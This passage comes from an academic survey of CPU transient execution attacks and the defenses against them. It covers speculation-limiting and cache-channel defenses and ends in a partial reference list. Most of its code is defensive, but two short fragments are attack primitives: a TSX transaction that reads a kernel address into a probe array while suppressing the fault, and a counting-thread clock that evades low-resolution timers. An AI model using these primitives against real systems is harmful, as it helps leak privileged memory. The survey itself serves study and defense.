The latter technique was used in an attack on micro-architectures which use pointer authentication [123]. Pointer authentication is used to protect privileged memory from being tampered with. Usually, the hash of the pointer is stored next to the pointer in the same stack frame [123]. In the mis-speculation window, the attacker builds a brute-force pointer authentication oracle to extract the correct hash for the pointer. If the guess is correct, the micro-architecture generates a valid pointer and loading the pointer results in the creation of a communication channel. If the guess is incorrect, the pointer is not created and the authentication instruction triggers an exception. By brute-forcing the hash behind a mis-speculation window, the exception, which would cause a program termination, is never triggered.
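A sketch of the transactional-memory variant on x86 (Intel TSX/RTM, compiled with -mrtm) might look as follows; the probe stride and the availability of TSX are assumptions.

#include <immintrin.h> /* _xbegin, _xend, _XBEGIN_STARTED (Intel RTM) */
#include <stdint.h>

/* Exception suppression via transactional memory: a faulting access
 * inside the transaction aborts it instead of delivering a signal,
 * while the transient cache side-effects survive the abort. */
static void suppressed_access(volatile uint8_t *kernel_addr,
                              volatile uint8_t *probe)
{
    if (_xbegin() == _XBEGIN_STARTED) {
        (void)probe[(*kernel_addr) * 512]; /* faults; aborts the block */
        _xend();                           /* not reached on a fault */
    }
    /* Execution resumes here after the abort; probe the cache next. */
}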

6 State-of-the-Art Defenses

There are multiple approaches in the state-of-the-art to defend against TEAs. Mainly, the literature focuses on the second and third steps of a TEA. The taxonomy adopted herein splits defenses into two categories: defenses that limit or prohibit speculation (the second step in setting up a TEA), and defenses that impede the formation of the communication channel (the final step in setting up a TEA).

6.1 Limited-Speculation Defenses

The key concept behind Limited-Speculation Defenses is that speculation is fundamentally insecure. Therefore, these defenses focus on controlling the micro-architectural state resulting from speculation. Table 3 shows seven techniques and is organized into six categories: whether the technique is a hardware and/or software implementation (HW/SW); the defense method (Method); the micro-architectural components protected by the technique (Protected Components); the drawbacks of the technique (Drawbacks); the maximum performance penalty (Max. Performance Penalty); and whether the technique is backward compatible (BC). Backward compatibility is defined using two variants: one for software and one for hardware. Software BC (SW BC) is defined as the ability to take a binary previously compiled for the same architecture and have it execute with the security guarantees provided by the new micro-architecture. Hardware BC (HW BC) is defined as the ability to backport the modifications performed by the technique to older micro-architectures (e.g., a microcode update that changes the behavior of certain instructions [62]). The maximum performance penalty metric used is the maximum performance penalty reported by any of the cited papers for each category and is only valid for the experimental methodology used. To facilitate consultation, the performance penalty is provided with the accompanying citation.
Table 3.
Technique | HW/SW | Method | Protected Components | Drawbacks | Max. Performance Penalty | SW BC | HW BC
Partition Speculation Components [10, 11, 12, 13, 65] | HW | Add PIDs per speculation entry | BTB, PHT, RAS, memory dependence | Partition fighting may lead to lower performance | N/A | Y | N
Clear Micro-Architectural State [150, 151, 171] | HW/SW | Flush all shared micro-architectural buffers on context switch | All | Context switches are slower in order to clear the micro-architectural state | 2% [171] | Y | N
Trap Speculation [3, 77, 132, 177, 182] | HW | Speculative instructions are only allowed to execute if they do not lead to a communication channel | All | Accesses to methods which lead to a communication channel need to operate in a different micro-architectural domain | 21% [177] | Y | N
Speculative State Defined in the ISA [5, 12, 65, 92, 167] | HW/SW | Add instructions to the ISA which limit speculation | All | A conservative use of these instructions leads to performance loss [11] | 125% [167] | N | Y/N
Retpoline [5, 63, 156] | SW | Trap the indirect jump predictor in a prediction loop | RAS | - | 10% [25] | N | -
Runtime Code Injection [148] | HW | Detect TEA gadgets at runtime and inject code which nullifies their effect | All | Runtime gadget detection and code injection may lead to lower performance | 21% [148] | Y | N
Recompilation [5, 8, 9, 11, 56, 60, 74, 108, 120] | SW | Prohibit compilation of transient gadgets; generate "secure" code sequences | All | Requires all binaries to be recompiled; new code sequences may not be as performant | N/A | N | -
Table 3. State-of-the-Art Defenses Which Limit Speculation
BC = Backward Compatibility.
Partition Speculation Components. This method is currently employed in some commercial micro-architectures. Intel and ARM use some form of partitioning to limit a process from influencing the speculation results of another process [13, 15]. Each entry in the speculative component has a unique application-specific ID. If there is no full ID match in the entry, the core does not speculate [13]. Its limiting factor is the resource contention between processes running on the same core. The partitioning scheme is secure if and only if all shared speculative components are partitioned. It has been shown that one of the latest Intel micro-architectures (Ice Lake), despite having in-silicon defenses against TEAs, is vulnerable to Spectre-type attacks because one shared speculation component, the PHT, was not partitioned [15]. Intel, ARM, and AMD do not provide any benchmarking for this type of defense; therefore, the performance penalty is unknown. This technique is backward compatible with regard to software, as any software will immediately take advantage of the modifications performed. However, these kinds of modifications cannot be applied directly to older micro-architectures; therefore, they fail hardware backward compatibility.
Clear Micro-Architectural State. On a context switch, the core flushes all shared micro-architectural buffers. The extent of the flushing depends on the security requirements of the system and/or software. There are proposals to handle the flushing in hardware [171], while others use software [150, 151]. Intel has modified the VERW instruction to overwrite specific micro-architectural components [62, 151]. Hardware solutions are always advantageous to programmers, as they do not have to reason about the micro-architectural state. Software solutions rely on the programmer executing the correct set of instructions to clear the necessary state. However, hardware solutions are conservative in clearing the micro-architectural state regardless of the security requirements of the running software. Therefore, a software solution can yield better performance in cases where the software's security model is known. In both cases, flushing part or all of the micro-architectural state adds to the performance penalty of context switches. Similarly to the previous category and for the same reasons, SW BC is maintained and HW BC is voided.
Trap Speculation. The trap speculation technique limits or blocks the results of speculative instructions from reaching a communication channel. Most proposals focus on blocking the cache hierarchy communication channel. As such, they add a per-thread private L0 cache to capture the effects of speculative instructions which operate over the cache hierarchy [3, 177]. If the speculation is correct, the effects of the speculative instructions are applied to the cache hierarchy; otherwise, they are ignored. One proposal stalls or predicts speculative memory accesses until they are verified [133]. Other proposals allow speculation to alter the cache hierarchy but will “undo” the state on a mis-speculation [77, 132]. Another proposal generalized the problem of speculative instructions transmitting data to a communication channel in any micro-architecture [182]. Recent research showed that these methods can still be attacked [16, 86]. For methods which trap speculation in an L0 cache, the order in which speculative memory accesses, and subsequent memory accesses, are performed causes enough of a timing difference to build a communication channel [16]. For methods which roll back the mis-speculated cache state, the communication channel is built from the timing difference associated with the size of the rollback state [86]. The hardware modifications required by this technique imply that HW BC is voided; however, SW BC is maintained.
Speculative State Defined in the ISA. The micro-architectural state is partially defined in the architectural state. This approach has been adopted by Intel [59, 61], AMD [5, 7], and ARM [11, 12]. New instructions are added to the ISA such that the order of operations in relation to a speculative instruction is always guaranteed. Similarly to memory ordering instructions (fences), speculation ordering instructions guarantee that instructions which follow a speculative instruction are not allowed to execute until the speculation has been verified. Intel and AMD provide instructions to limit jump and memory dependence speculation [5, 7, 59, 61]. ARM goes further and provides instructions not only to limit jump and memory dependence speculation, but also to limit any speculation [11, 12]. Old programs have to be recompiled to take advantage of these new instructions, which voids SW BC. HW BC can be maintained if the older platforms allow microcode updates which introduce new instructions or add side-effects to existing instructions [62]. Another type of protection uses special hardware, within the backend of the core, that is able to track and stop data forwarding to instructions with measurable side-effects [92, 167]. The latter technique guarantees security and SW BC through extensive hardware modifications. As a result, the modifications cannot be backported to older micro-architectures, which means they are not HW BC. Although merging the micro-architectural and the architectural state guarantees speculation behavior to the programmer, it limits the design freedom provided to micro-architecture implementations. Furthermore, the usage of these instructions requires a deep understanding of the micro-architecture to not only guarantee security but to also maintain high performance. Much like memory ordering instructions, a conservative use of speculation-limiting instructions leads to performance loss [11].
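As a concrete sketch of such an ISA-level mechanism, Intel's and AMD's documented guidance uses lfence as a speculation barrier after a bounds check; applied to the gadget of Listing 6 (reusing its declarations), it might look as follows.

#include <emmintrin.h> /* _mm_lfence; assumes x86. ARM offers CSDB/SB. */

/* Fenced variant of the Spectre-PHT gadget: the fence keeps the
 * dependent loads from executing until the bounds check has resolved. */
uint8_t victim_fenced(size_t x)
{
    if (x < buf1_size) {
        _mm_lfence();               /* serializes dispatch: no transient loads */
        return buf2[buf1[x] * 512]; /* executes only with x actually in bounds */
    }
    return 0;
}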
Retpoline. Retpoline is a technique which sets up the RAS with a prediction loop. The prediction loop locks the speculation state into fetching and executing the same safe instruction sequence until the speculation is verified [5, 63, 156]. As this technique relies on precise code sequences around certain function calls, the backward compatibility requirement is not met. Despite limiting the RAS, there is still a vulnerable timing window to perform a Spectre attack while setting up the required prediction loop [97]. Moreover, recent micro-architectures that have in-silicon defenses against RAS TEAs have been shown to still be vulnerable against Spectre [170]. Since Retpoline is a software technique, only SW BC is considered, and, as stated, it is not maintained.
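For reference, a sketch of the published x86-64 retpoline thunk, which replaces an indirect jmp *%r11, is shown below as a top-level GNU C asm block; the label name follows the compiler-emitted thunks, but the exact emitted sequence may differ per toolchain.

/* Retpoline thunk sketch (AT&T syntax) replacing "jmp *%r11". */
__asm__(
    ".text\n"
    ".globl __x86_indirect_thunk_r11\n"
    "__x86_indirect_thunk_r11:\n"
    "    call 1f\n"            /* pushes &2f, jumps to the dispatch code  */
    "2:  pause\n"              /* speculative path only: the RAS predicts */
    "    lfence\n"             /* a return to 2f, trapping speculation in */
    "    jmp 2b\n"             /* this harmless loop until verification   */
    "1:  mov %r11, (%rsp)\n"   /* overwrite return address with target    */
    "    ret\n"                /* architectural path jumps to *%r11       */
);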
Runtime Code Injection. The decode unit inspects the sequence of emitted micro-code. If the generated micro-code matches that of a TEA, the decoder injects a specific micro-code sequence that nullifies the effects of possibly mis-speculated instructions on a communication channel. These code sequences can be the ones from the previously described techniques, such as: instructions to clear the micro-architectural state, instructions to limit speculation, and/or retpoline. Using the cache hierarchy as a communication channel, the micro-code sequencer injects fence instructions such that some memory accesses are strictly ordered behind a speculative instruction [148]. Regardless of the detection system used, this technique will always be susceptible to new exploits that remain undetected. Furthermore, the detection mechanism and code injection may lead to performance loss in certain workloads [148]. To avoid incurring the performance penalty for every binary, the software environment can mark binaries as safe or unsafe depending on the presence of TEA gadgets or communication channels [56, 74, 108, 120]. Moreover, to further improve performance, the software environment can tag specific regions of interest to defend against TEAs. As for BC, since this code injection method needs to reside in the decode stage of the micro-architecture's pipeline, SW BC is maintained and HW BC is not.
Recompilation. This technique is equivalent to Runtime Code Injection, but performed statically: the compiler detects vulnerable code sequences and replaces them with safe variants [56, 74, 108, 120]. Compared with the runtime code injection technique, there is no extra performance penalty for detection and mitigation during runtime; the cost of recompilation is paid at compile-time. The disadvantage, in comparison to the runtime alternative, is that the source code needs to be available to perform the recompilation, while the runtime alternative can execute any binary. Hence, recompilation is not SW BC. Both alternatives suffer from the same drawbacks.
A common theme among all techniques that look to limit speculation is that they all incur some performance penalty. Moreover, some techniques have outstanding security vulnerabilities. All techniques try to define what the insecure speculative state is and how it should be limited. Except for trap speculation, they consider the speculative state to be any computation which stems from any speculation; as a result, they limit the global speculative state. The Trap Speculation technique, in contrast, reduces the insecure speculative state to only speculative instructions which lead to communication channels. Recall that a TEA is only successful if the attacker is able to recover data from the victim, not merely if there is some manipulated speculative state.
Discussion. Providing security by limiting speculation is a paradigm shift in how micro-architectures are designed and implemented. Through this methodology, the speculative state needs to be precisely defined for all micro-architectural states. This analysis is akin to that of the allowed memory consistency model [106]. Using formal analysis of speculative states, one can design tools which detect possible insecure states [24, 47, 98, 102, 108, 117, 154]. There is little research on how a micro-architectural implementation, through a Hardware Description Language (HDL), can be fixed if an illegal speculative state is found [40, 57, 105, 157]. This is a difficult problem to solve correctly, as the setup and clearing of a speculative state is particular to each micro-architecture implementation, not to the architectural model (even if it partially defines the speculative state). An unexplored avenue for micro-architectural programming is the usage of hint instructions, both behind and not behind speculative instructions, in attacks. Hint instructions are architectural no-operations; however, they directly program the micro-architectural state. Most ISAs provide instructions to hint some prediction mechanism into a known state [10, 65, 126]. These hints commonly affect jump prediction and memory dependence prediction units. Although attacks have been found for particular speculation mechanisms, this does not mean novel speculative components are immune to them. A survey of proposed speculative mechanisms showed that attacks can still be mounted and may provide unlimited access to certain resources in the system [162]. The proposed speculation mechanisms range from value prediction (predicting the results of operations) to data compression inside and outside the core. It has already been shown that data compression in the cache can be exploited to infer what data is stored in a cache line depending on the level of compression [155]. Value prediction allows an attacker to inject data into the victim's operations if the predictor is not protected [141].
Summary. Limiting the speculative state is bound to be a complex task, as the current paradigm for designing and implementing micro-architectures does not define speculative state. Partially defining the micro-architectural state in the ISA is a solution that moves the responsibility for the problem to the programmer. Historically, shifting the responsibilities of the micro-architecture to the programmer has not been advantageous. The design of a micro-architecture usually centers on facilitating the programmer's work. Micro-Architectures employ OoO execution because an OoO execution engine is able to obtain good performance from non-performant code. Cache hierarchies are employed because programs implicitly exhibit spatial and temporal locality in their memory accesses. An example where micro-architectures were designed around a programmer's ability to write correct and performant code is the memory consistency model [106]. Weaker memory models can provide better performance than strong memory models; however, they rely on the programmer having the knowledge to correctly insert memory ordering instructions to get the expected results without sacrificing performance. A recent trend in modern computer architectures shows a preference toward stronger memory models due to the ease of programming. A recent industry example is the stronger ARMv8 memory model: up until ARMv7, ARM employed a weak memory model which was hard to formally define due to the numerous possible outcomes in many litmus tests [118]. The RISC-V memory model, which is still being defined, also shows features that would previously appear only in strong memory models [126]. Similarly to memory consistency models, the micro-architectural states allowed after a speculative event can also be defined using strong and weak qualifiers: a weak speculation model allows any state to result from any speculation, whereas a strong speculation model allows a finite number of states to result from a set of known speculative events.

6.2 Limited-Communication-Channel Defenses

Unlike limited-speculation defenses, limited-communication-channel defenses allow cores to speculate. The observation is that speculation is not inherently insecure; rather, the insecurity comes from the attacker being able to build a communication channel with the victim. Table 4 shows four techniques for preventing the attacker from communicating with the victim using the cache hierarchy as a communication channel. Table 4 uses the same categories as the previous section: Method, Protected Components, Drawbacks, Maximum Performance Penalty, and backward compatibility (software and hardware).
Table 4.
Technique | HW/SW | Method | Protected Components | Drawbacks | Max. Performance Penalty | SW BC | HW BC
Cache Partitioning [32, 33, 50, 78, 88, 164, 185] | HW/SW | Cache is partitioned between multiple running processes | Cache level | Performance penalty due to resource fighting | 5% [32] | Y | N
Randomized Caches [41, 89, 121, 122, 125, 131, 137, 147, 169, 184] | HW | Each process uses a different hash function to access the cache | Cache level | Increase in access latency due to hash functions | 13% [184] | Y | N
Low Resolution Timers [103, 144, 152] | HW/SW | Timers with high resolution are not available | Micro-architectural state | - | N/A | Y | Y
Coherence Protocol [172] | HW | Coherence protocol masks speculative accesses to the cache hierarchy | Cache hierarchy | Complexity of the coherence scheme and the network increases | 8.3% [172] | Y | N
Table 4. State-of-the-Art Defenses Which Break the Communication Channel
BC = Backward Compatibility.
Cache Partitioning. Cache levels, across the hierarchy, are split among all running processes in the system. The size of each partition can be statically defined [6, 32, 35, 53, 88], where a certain number of sets, ways, or both is always reserved for a given process, or dynamically defined [33, 50, 164, 185], depending on certain heuristics. Regardless of using dynamic or static partitions, there is always a limit to the number of partitions a cache can hold. Partitioning uses unique process identifiers to gate access to a partition's state: no process other than the owner can change the state of a partition, namely its size or content. Statically partitioned caches are immune to the construction of communication channels because no process other than the owner of the partition can manipulate its state. However, due to the strictness of the partition state guarantees, these designs lose performance when more demanding processes are given smaller partitions than less demanding processes. Dynamically defined partitions circumvent the performance issues but may be vulnerable to a new kind of communication channel: an attacker can deploy multiple processes which attempt to reduce the partition of the victim and occupy all but one partition in the cache. When the victim requires a larger partition, the controller will have to reduce an attacker-controlled partition. The attacker can inspect all partitions and infer some data transmission from how a partition was reduced. It is important to note that, once again, if the attacker does not use a communication channel in the cache hierarchy, then the defenses provided by Cache Partitioning are ineffective.
Randomized Caches. In contrast to partitioned caches, instead of splitting the cache and controlling performance, randomized caches leverage the observation that all communication channels can be reduced to eviction-based channels. Replacement-Policy-Based channels, similarly to eviction-based channels, require finding multiple addresses that occupy the same set. Coherence-Based channels require shared memory to not be deduplicated in the cache hierarchy. Therefore, replacement-policy-based channels can be considered a subset of eviction-based channels, while coherence-based channels can be reduced to eviction-based channels by duplicating memory in the cache hierarchy. The latter reduction has a side-effect wherein cacheable shared memory cannot be writable, as that would require stores to shared memory to modify multiple cache lines in the hierarchy. By reducing all communication channels to the same type, randomized caches look to make the problem of “finding a group of addresses which occupy the same set” hard. This is achieved by using a different hash function per way. The traditional set-associative cache is split into w direct-mapped caches (\(\text{ways} = 1\)), wherein each direct-mapped cache uses a different hash function. The set is the group of all cache lines returned from each direct-mapped cache. There are proposals which use cryptographic hashes [131, 137, 169], while others change the hash dynamically [121, 122] or use a single layer of pointer redirection [89]. Other works do not rely on these techniques and seek to define security by intrinsically tying multiple states together and allowing displacements within the cache [41]. Similarly to cache partitioning, if the attacker does not use a communication channel in the cache hierarchy, then the defenses provided by Randomized Caches are ineffective.
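The per-way hashing can be sketched as follows; the geometry (NUM_WAYS, SETS_LOG2), the keyed_hash mixer, and the per-process keys are illustrative assumptions, with real designs using stronger (possibly cryptographic) functions.

#include <stdint.h>

#define NUM_WAYS  8   /* assumed: one direct-mapped slice per way */
#define SETS_LOG2 9   /* assumed: 512 sets per slice */

/* Toy keyed mixer standing in for a per-way, per-process hash. */
static uint32_t keyed_hash(uint64_t key, uint64_t line_addr)
{
    uint64_t x = line_addr ^ key;
    x ^= x >> 33;
    x *= 0xff51afd7ed558ccdULL;
    x ^= x >> 33;
    return (uint32_t)(x & ((1u << SETS_LOG2) - 1));
}

/* The lookup "set" is the union of one candidate index per slice, so an
 * eviction set valid under one key is useless under another. */
static void lookup_candidates(const uint64_t way_key[NUM_WAYS],
                              uint64_t line_addr,
                              uint32_t idx_out[NUM_WAYS])
{
    for (int w = 0; w < NUM_WAYS; w++)
        idx_out[w] = keyed_hash(way_key[w], line_addr);
}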
Low Resolution Timers. The communication channels described in Section 4 rely on measuring the latency of memory operations to infer what data was transmitted. A possible defense is to decrease the resolution of the timer read by the attacker, such that no difference can be detected between an access serviced by the cache hierarchy and one serviced by external memory, or between two different events in the cache hierarchy. Certain execution environments, e.g., browsers, forbid software from accessing the high-performance counters and timers available in the system [103, 144, 149, 152]. However, it has been shown that high-resolution timers can be built using other methods [104, 136, 170, 173, 186]. Generally, these timers are constructed by executing constant-time code and inferring a clock from its progress. Another option is to amplify the latency of transient instructions, e.g., by relying on multiple high-latency micro-architectural events, such that the low-resolution timer can no longer hide the sequence of events being measured.
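A sketch of such a counting-thread clock might look as follows; the shared-counter approach is one of the cited constructions, and its calibration against real time is an assumption left to the attacker.

#include <pthread.h>
#include <stdint.h>

static volatile uint64_t ticks; /* surrogate clock, incremented forever */

/* Counter thread: spawn once, e.g.,
 *   pthread_t t; pthread_create(&t, NULL, counter_thread, NULL); */
static void *counter_thread(void *arg)
{
    (void)arg;
    for (;;)
        ticks++;
    return NULL; /* unreachable */
}

/* Measure an access with the surrogate clock instead of rdtsc. */
static uint64_t time_access(volatile const uint8_t *addr)
{
    uint64_t t0 = ticks;
    (void)*addr;
    return ticks - t0;
}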
Coherence Protocol. The cache hierarchy is manipulated by memory accesses performed by all cores in the system, speculative or not. The coherence protocol is tasked with maintaining a shared global state between all caches in a system, and any memory access creates coherence traffic in the network. Therefore, even if the cache hierarchy could be efficiently cleared on a mis-speculation, the attacker could still build a communication channel through the latency of the coherence network. Instead of defending particular cache levels, coherence protocol defenses aim to defend the whole cache hierarchy by controlling which cache lines are available in the hierarchy. Similarly to the trap speculation technique in Section 6.1, the coherence protocol reverses the effects of speculation when a misprediction occurs [172].
Discussion. A significant advantage of limited-communication-channel defenses is that the performance penalty should be lower while the core remains unchanged. The works cited herein show a maximum performance penalty of 13% [184] for limited-communication-channel defenses, whereas the limited-speculation defenses show a maximum performance penalty of 125% [167]. Focusing on communication channel defenses has three advantages: the ISA does not need to define the global micro-architectural/speculative state; only a small portion of the micro-architectural states lead to a communication channel; and blocking data transfers in the communication channel can be designed and employed independently of the micro-architectural state which connects to the communication channel. Since any TEA requires a communication channel, a limited-communication-channel defense provides a clear separation of complexities between the speculative state and security. Because limited-communication-channel defenses focus on the cache hierarchy, which has no defined architectural state, most defenses should maintain SW BC; the same is not true for limited-speculation defenses. However, HW BC is not maintained due to the required changes to the cache hierarchy. No member of the industry has yet deployed any defense of this type. One may think that Intel's Cache Allocation Technology (CAT) could be considered a currently employed defense; however, CAT is insecure because it still allows page sharing between victim and attacker, which permits setting up FLUSH+RELOAD [179] or FLUSH+FLUSH [46] communication channels [79]. The reluctance to deploy limited-communication-channel defenses may come from the complexity of the cache hierarchy and the fact that other communication channels may be used [18, 28, 116, 124].
Summary. If the goal of providing year-on-year performance improvements is to be maintained, the solution closest to that goal is to use limited-communication-channel defenses. There is significant interest in the community in designing secure caches, not only to deter TEAs but also to improve the security of trusted execution environments [29]. Communication channels need to keep being cataloged. This process involves understanding how the communication channel is built, how data is transferred, and how the channel construction and/or transfer can be blocked.

7 Conclusions

TEAs introduce a paradigm shift in computer architectures. Architectures are no longer designed solely with performance and power in mind, but also with security. Many techniques and components which would provide better performance are susceptible to TEAs. The current toolchains, development flows, and techniques used to implement and design micro-architectures need to be updated to take these new threats into account. Moreover, new metrics related to security need to be defined. Current computer architectures are optimized for performance per watt; however, TEAs demonstrate that new metrics, which relate security to performance, are required. Furthermore, there are unexplored TEAs in hint instructions and within the memory consistency model.
This survey gives an overview of the components involved in the design of micro-architectures which are susceptible to TEAs. This attack type involves implicitly programming a state that is not defined in the ISA; transient execution is the glue that permits these attacks to occur, which leads to security flaws. We hope that the detailed explanation of the original Meltdown-US and Spectre-PHT/BTB attacks, as well as of recent advances in attacks and defenses against TEAs, inspires and contributes to the design of more secure processors and systems.

Acknowledgments

The authors would like to thank Paulo Martins, Diogo Marques, and João Vieira for providing suggestions to improve this survey.

References

[1]
Onur Acıiçmez and Werner Schindler. 2008. A vulnerability in RSA implementations due to instruction cache analysis and its demonstration on OpenSSL. In Topics in Cryptology—CT-RSA 2008, Tal Malkin (Ed.), Springer, Berlin, 256–273.
[2]
Anant Agarwal, Richard Simoni, John Hennessy, and Mark Horowitz. 1988. An evaluation of directory schemes for cache coherence. ACM SIGARCH Computer Architecture News 16, 2 (1988), 280–298.
[3]
Sam Ainsworth and Timothy M. Jones. 2020. MuonTrap: Preventing cross-domain spectre-like attacks by capturing speculative state. In Proceedings of the ACM/IEEE 47th Annual International Symposium on Computer Architecture (ISCA’20). IEEE Press, New York, NY, 132–144. DOI:
[4]
AMD. 2007. AMD Opteron Processor Product Data Sheet. Retrieved from https://www.amd.com/system/files/TechDocs/23932.pdf.
[6]
AMD. 2018. AMD64 Technology Platform Quality of Service Extensions. (2018). Retrieved from https://developer.amd.com/wp-content/resources/56375_1.00.pdf.
[7]
AMD. 2018. AMD64 Technology Speculative Store Bypass Disable. (2018). Retrieved from https://developer.amd.com/wp-content/resources/124441_AMD64_SpeculativeStoreBypassDisable_Whitepaper_final.pdf.
[8]
AMD. 2019. Speculation Behavior in AMD Micro-Architectures. (2019). Retrieved from https://www.amd.com/system/files/documents/security-whitepaper.pdf.
[9]
AMD. 2020. Software Techniques for Managing Speculation on AMD Processors. (2020). Retrieved from https://developer.amd.com/wp-content/resources/90343-D_SoftwareTechniquesforManagingSpeculation_WP_9-20Update_R2.pdf.
[10]
AMD. 2021. AMD64 Architecture Programmer’s Manual Volume 2: System Programming. AMD. Retrieved from https://www.amd.com/system/files/TechDocs/24593.pdf.
[12]
ARM. 2022. Arm Architecture Reference Manual for A-profile architecture. ARM. Retrieved from https://developer.arm.com/documentation/ddi0487/latest.
[14]
J-L Baer and W-H Wang. 1988. On the inclusion properties for multi-level cache hierarchies. ACM SIGARCH Computer Architecture News 16, 2 (1988), 73–80.
[15]
Enrico Barberis, Pietro Frigo, Marius Muench, Herbert Bos, and Cristiano Giuffrida. 2022. Branch history injection: On the effectiveness of hardware mitigations against cross-privilege spectre-v2 attacks. In 31st USENIX Security Symposium (USENIX Security 22). USENIX Association, Santa Clara, CA. Retrieved from http://download.vusec.net/papers/bhi-spectre-bhb_sec22.pdf. Intel Bounty Reward.
[16]
Mohammad Behnia, Prateek Sahu, Riccardo Paccagnella, Jiyong Yu, Zirui Neil Zhao, Xiang Zou, Thomas Unterluggauer, Josep Torrellas, Carlos Rozas, Adam Morrison, Frank Mckeen, Fangfei Liu, Ron Gabor, Christopher W. Fletcher, Abhishek Basak, and Alaa Alameldeen. 2021. Speculative interference attacks: Breaking invisible speculation schemes. In Proceedings of the 26th ACM International Conference on Architectural Support for Programming Languages and Operating Systems (ASPLOS 2021). Association for Computing Machinery, New York, NY, 1046–1060. DOI:
[17]
Daniel J. Bernstein. 2005. Cache-timing Attacks on AES. University of Illinois, Chicago.
[18]
Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, Alessandro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus. 2019. SMoTherSpectre: Exploiting speculative execution through port contention. In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security (CCS’19). Association for Computing Machinery, New York, NY, 785–800. DOI:
[19]
Tyler Bletsch, Xuxian Jiang, Vince W Freeh, and Zhenkai Liang. 2011. Jump-oriented programming: A new class of code-reuse attack. In Proceedings of the 6th ACM Symposium on Information, Computer and Communications Security. 30–40.
[20]
Samira Briongos, Pedro Malagon, Jose M. Moya, and Thomas Eisenbarth. 2020. RELOAD+REFRESH: Abusing cache replacement policies to perform stealthy cache attacks. In Proceedings of the 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 1967–1984. Retrieved from https://www.usenix.org/conference/usenixsecurity20/presentation/briongos. https://www.usenix.org/system/files/sec20-briongos_0.pdf.
[21]
Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, and Daniel Gruss. 2019. A systematic evaluation of transient execution attacks and defenses. In 28th USENIX Security Symposium (USENIX Security 19). USENIX Association, 249–266. Retrieved from https://www.usenix.org/conference/usenixsecurity19/presentation/canella.
[22]
Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Marina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo Van Bulck, and Yuval Yarom. 2019. Fallout: Leaking data on meltdown-resistant CPUs. In Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security (CCS’19). Association for Computing Machinery, New York, NY, 769–784. DOI:
[23]
Claudio Canella, Sai Manoj Pudukotai Dinakarrao, Daniel Gruss, and Khaled N. Khasawneh. 2020. Evolution of defenses against transient-execution attacks. In Proceedings of the 2020 on Great Lakes Symposium on VLSI (GLSVLSI’20). Association for Computing Machinery, New York, NY, 169–174. DOI:
[24]
Sunjay Cauligi, Craig Disselkoen, Daniel Moghimi, Gilles Barthe, and Deian Stefan. 2021. SoK: Practical foundations for spectre defenses. IEEE Symposium on Security and Privacy (SP’22), IEEE, 666–680.
[25]
Baozi Chen, Qingbo Wu, Yusong Tan, Liu Yang, and Peng Zou. 2018. Exploration for software mitigation to spectre attacks of poisoning indirect branches. IETE Technical Review 35, sup1 (2018), 119–127.
[26]
Caisen Chen, Tao Wang, Yingzhan Kou, Xiaocen Chen, and Xiong Li. 2013. Improvement of trace-driven I-Cache timing attack on the RSA algorithm. Journal of Systems and Software 86, 1 (Jan. 2013), 100–107. DOI:
[27]
George Z. Chrysos and Joel S. Emer. 1998. Memory dependence prediction using store sets. In Proceedings of the 25th Annual International Symposium on Computer Architecture (ISCA’98). IEEE Computer Society, 142–153. DOI:
[28]
Jack Cook, Jules Drean, Jonathan Behrens, and Mengjia Yan. 2022. There’s always a bigger fish: A clarifying analysis of a machine-learning-assisted side-channel attack. In Proceedings of the 49th Annual International Symposium on Computer Architecture. 204–217.
[29]
Victor Costan and Srinivas Devadas. 2016. Intel SGX Explained. Cryptology ePrint Archive, Report 2016/086. (2016). Retrieved from https://ia.cr/2016/086.
[30]
Adrian Cristal, Daniel Ortega, Josep Llosa, and Mateo Valero. 2004. Out-of-order commit processors. In Proceedings of the 10th International Symposium on High Performance Computer Architecture (HPCA’04). IEEE, IEEE Press, 48–59.
[31]
Yujie Cui and Xu Cheng. 2022. Abusing cache line dirty states to leak information in commercial processors. In Proceedings of the 2022 IEEE International Symposium on High Performance Computer Architecture (HPCA). IEEE Press.
[32]
Ghada Dessouky, Tommaso Frassetto, and Ahmad-Reza Sadeghi. 2020. HybCache: Hybrid side-channel-resilient caches for trusted execution environments. In Proceedings of the 29th USENIX Security Symposium (USENIX Security 20). USENIX Association, 451–468. Retrieved from https://www.usenix.org/conference/usenixsecurity20/presentation/dessouky.
[33]
Ghada Dessouky, Alexander Gruler, Pouya Mahmoody, Ahmad-Reza Sadeghi, and Emmanuel Stapf. 2022. Chunked-cache: On-demand and scalable cache isolation for security architectures. In Proceedings of the Network and Distributed System Security Symposium (NDSS) 2022. The Internet Society. Retrieved from https://arxiv.org/abs/2110.08139.
[34]
Craig Disselkoen, David Kohlbrenner, Leo Porter, and Dean Tullsen. 2017. Prime+Abort: A timer-free high-precision L3 cache attack using intel TSX. In Proceedings of the 26th USENIX Security Symposium (USENIX Security 17). USENIX Association, 51–67. Retrieved from https://www.usenix.org/conference/usenixsecurity17/technical-sessions/presentation/disselkoen.
[35]
Leonid Domnitser, Aamer Jaleel, Jason Loew, Nael Abu-Ghazaleh, and Dmitry Ponomarev. 2012. Non-monopolizable caches: Low-complexity mitigation of cache side channel attacks. ACM Transactions on Architecture and Code Optimization 8, 4, Article 35 (Jan. 2012), 21 pages. DOI:
[36]
Jack Doweck. 2006. Inside Intel® Core microarchitecture. In Proceedings of the 2006 IEEE Hot Chips 18 Symposium (HCS). IEEE Press, New York, NY, 1–35. DOI:
[37]
A.N. Eden and T. Mudge. 1998. The YAGS branch prediction scheme. In Proceedings of the 31st Annual ACM/IEEE International Symposium on Microarchitecture. IEEE Computer Society, 69–77.
[38]
Noel Eisley, Li-Shiuan Peh, and Li Shang. 2006. In-network cache coherence. In Proceedings of the 2006 39th Annual IEEE/ACM International Symposium on Microarchitecture (MICRO’06). IEEE Press, New York, NY, 321–332.
[39]
Mark Evers, Leslie Barnes, and Mike Clark. 2021. Next generation “Zen 3” core. In Proceedings of the 2021 IEEE Hot Chips 33 Symposium (HCS). IEEE Press, New York, NY, 1–32.
[40]
